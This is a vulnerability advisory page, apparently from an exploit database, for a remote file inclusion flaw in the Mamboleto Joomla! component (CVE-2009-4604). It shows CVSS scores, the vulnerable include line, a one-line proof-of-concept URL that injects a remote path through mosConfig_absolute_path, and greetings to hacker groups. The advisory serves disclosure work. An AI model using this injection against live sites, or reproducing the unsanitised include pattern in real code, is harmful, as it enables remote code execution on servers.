Mamboleto Joomla! component Remote File Include Vulneralbility

2010-01-12 / 2010-01-13
Credit: Don Tukulesto
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-4604
CWE: CWE-98
Dork: Wie WiLL Not Go Down


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/************************************************************************** [!] Mamboleto Joomla! component Remote File Include Vulneralbility [!] Author : Don Tukulesto (root@indonesiancoder.com) [!] Homepage : http://www.indonesiancoder.com [!] Date : December 10, 2009 [!] Tune In : http://antisecradio.fm (choose your weapon) **************************************************************************/ [ Software Information ] [+] Vendor : http://www.fernandosoares.com.br/ [+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28 [+] Version() : 2.0 RC3 [+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em "legacy mode". Muito mais aprimorado com dois bancos a mais (Sicredi e Bancoob) e com um novo mdulo de integra&#227;o com o VirtueMart. [+] Method : Remote File Inclusion [+] Dork : Wie WiLL Not Go Down =========================================================================== [ Vulnerable File ] [+] mamboleto.php Line 123 include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php'); [ Proof of Concept ] http://127.0.0.1/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666] =========================================================================== [ Who The Hell Has Control of That Damn Smoke Machine ] [~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown [~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd, [~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz [~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!! [~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends [ rm -rf yourself ] [>] FOR MALINGSIAL [ some quotes ] [+] Jack- says : why so serious ? [+] Yadoy666 says : awas ada tukang =)) [+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!! [+] Pathloader says : Oke lah kalau beg... beg... beg... begitu :D [+] tiw0L says : Ojo di maem pleaseeeeee!!! [+] kaMtiEz says : aku bukan HOMO <++++ Fitnah nih ga mau ngakuin :p

References:

http://xforce.iss.net/xforce/xfdb/54662
http://www.securityfocus.com/bid/37280
http://www.exploit-db.com/exploits/10369
http://packetstormsecurity.org/0912-exploits/joomlamamboleto-rfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top